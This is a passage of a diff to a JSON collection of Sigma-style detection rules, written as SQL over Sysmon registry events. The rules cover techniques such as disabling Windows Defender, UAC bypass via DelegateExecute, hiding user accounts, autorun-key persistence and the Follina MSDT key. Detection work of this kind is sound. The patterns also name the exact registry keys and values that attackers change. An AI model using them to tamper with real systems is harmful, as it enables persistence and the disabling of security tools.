'%\\\\Classes\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.cmd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Details = '{807583E5-5146-11D5-A672-00B0D022E945}') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\lnkfile\\\\shellex\\\\ContextMenuHandlers\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (Details LIKE '%NetworkService%' ESCAPE '\\'))" ], - "filename": "registry_set_asep_reg_keys_modification_classes.yml" + "filename": "registry_set_fax_change_service_user.yml" }, { - "title": "Execution DLL of Choice Using WAB.EXE", - "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "title": "Enable Microsoft Dynamic Data Exchange", + "id": "63647769-326d-4dde-a419-b925cc0caf42", "status": "test", - "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", - "author": "oscd.community, Natalia Shornikova", + "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1559.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (Details LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\Word\\\\Security\\\\AllowDDE' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLaunch' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLookup' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_wab_dllpath_reg_change.yml" + "filename": "registry_set_office_enable_dde.yml" }, { - "title": "Service Binary in Uncommon Folder", - "id": "277dc340-0540-42e7-8efb-5ff460045e07", - "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a uncommon directory", - "author": "Florian Roth (Nextron Systems)", + "title": "RDP Sensitive Settings Changed to Zero", + "id": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", + "status": "test", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", + "attack.persistence", "attack.t1112" ], "falsepositives": [ - "Unknown" + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\fDenyTSConnections' ESCAPE '\\' OR TargetObject LIKE '%\\\\fSingleSessionPerUser' ESCAPE '\\' OR TargetObject LIKE '%\\\\UserAuthentication' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "registry_set_creation_service_uncommon_folder.yml" + "filename": "registry_set_terminal_server_suspicious.yml" }, { - "title": "Add Debugger Entry To Hangs Key For Persistence", - "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "title": "Potential Signing Bypass Via Windows Developer Features - Registry", + "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion" ], "falsepositives": [ - "This value is not set by default but could be rarly used by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "registry_set_hangs_debugger_persistence.yml" + "filename": "registry_set_turn_on_dev_features.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed", - "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "title": "Potential PendingFileRenameOperations Tamper", + "id": "4eec988f-7bf0-49f1-8675-1e6a510b3a2a", "status": "experimental", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Installers and updaters may set currently in use files for rename after a reboot." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\PendingFileRenameOperations%' ESCAPE '\\') AND ((Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regedit.exe' ESCAPE '\\')))" ], - "filename": "registry_set_dns_server_level_plugin_dll.yml" + "filename": "registry_set_susp_pendingfilerenameoperations.yml" }, { - "title": "Hiding User Account Via SpecialAccounts Registry Key", - "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", + "title": "Registry Hide Function from User", + "id": "5a93eb65-dffa-4543-b761-94aa60098fb6", "status": "test", - "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1564.002" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate admin script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideClock' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAHealth' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCANetwork' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAPower' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAVolume' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowInfoTip' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowCompColor' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_special_accounts.yml" + "filename": "registry_set_hide_function_user.yml" }, { - "title": "Disable Windows Defender Functionalities Via Registry Keys", - "id": "0eb46774-f1ab-4a74-8238-1155855f2263", + "title": "Disable Internal Tools or Feature in Registry", + "id": "e2482f8d-3443-4237-b906-cc145d87a076", "status": "experimental", - "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", - "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", + "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1112" ], "falsepositives": [ - "Administrator actions" + "Legitimate admin script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskmgr' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Explorer\\\\DisableNotificationCenter' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableChangePassword' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableLockWorkstation' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\StartMenuLogOff' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\shutdownwithoutlogon' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PushNotifications\\\\ToastEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Storage\\\\Write Protection' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\StorageDevicePolicies\\\\WriteProtect' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_windows_defender_tamper.yml" + "filename": "registry_set_disable_function_user.yml" }, { - "title": "PowerShell as a Service in Registry", - "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "title": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)", + "id": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", "status": "test", - "description": "Detects that a powershell code is written to the registry as a service.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", + "author": "Sittikorn S", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1221" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKCR\\\\ms-msdt\\\\%' ESCAPE '\\')" ], - "filename": "registry_set_powershell_as_service.yml" + "filename": "registry_set_cve_2022_30190_msdt_follina.yml" }, { - "title": "Outlook Macro Execution Without Warning Setting Enabled", - "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", - "status": "test", - "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", - "author": "@ScoubiMtl", + "title": "Potential Persistence Via CHM Helper DLL", + "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "status": "experimental", + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" ], - "filename": "registry_set_office_outlook_enable_macro_execution.yml" + "filename": "registry_set_persistence_chm.yml" }, { - "title": "Bypass UAC Using DelegateExecute", - "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", - "status": "test", - "description": "Bypasses User Account Control using a fileless method", - "author": "frack113", + "title": "New DNS ServerLevelPluginDll Installed", + "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "status": "experimental", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1548.002" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND Details = '(Empty)')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" ], - "filename": "registry_set_bypass_uac_using_delegateexecute.yml" + "filename": "registry_set_dns_server_level_plugin_dll.yml" }, { - "title": "CurrentVersion NT Autorun Keys Modification", - "id": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "title": "Common Autorun Keys Modification", + "id": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", "status": "experimental", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", "tags": [ "attack.persistence", "attack.t1547.001" @@ -31183,1374 +31154,1449 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\VmApplet%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Taskman%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GpExtensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AppSetup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AlternateShells\\\\AvailableShells%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\IconServiceLib%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Font Drivers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Load%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\DisableExceptionChainValidation' ESCAPE '\\' OR TargetObject LIKE '%\\\\MitigationOptions' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\ClickToRunStore\\\\HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\PreviousPolicyAreas%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\MaxNoGPOListChangesInterval%' ESCAPE '\\') AND Details IN ('DWORD (0x00000009)', 'DWORD (0x000003c0)')) OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Delete Cached Update Binary' ESCAPE '\\' AND Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe\"' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows CE Services\\\\AutoStart%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\Setup\\\\CmdLine%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Ctf\\\\LangBarAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Handler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Htmlfile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Environment\\\\UserInitMprLogonScript%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\UrlSearchHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Desktop\\\\Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Classes\\\\Clsid\\\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\\\Inprocserver32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRunStore\\\\HKMU\\\\SOFTWARE\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\') OR Details IN ('{314111c7-a502-11d2-bbca-00c04f8ec294}', '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}', '{42089D2D-912D-4018-9087-2B87803E93FB}', '{5504BE45-A83B-4808-900A-3A5C36E7F77A}', '{807583E5-5146-11D5-A672-00B0D022E945}')) OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{8A69D345-D564-463c-AFF1-A69D9E530F96}%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{89820200-ECBD-11cf-8B85-00AA005B4383}%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml" + "filename": "registry_set_asep_reg_keys_modification_common.yml" }, { - "title": "Registry Hide Function from User", - "id": "5a93eb65-dffa-4543-b761-94aa60098fb6", - "status": "test", - "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", - "author": "frack113", + "title": "Potential 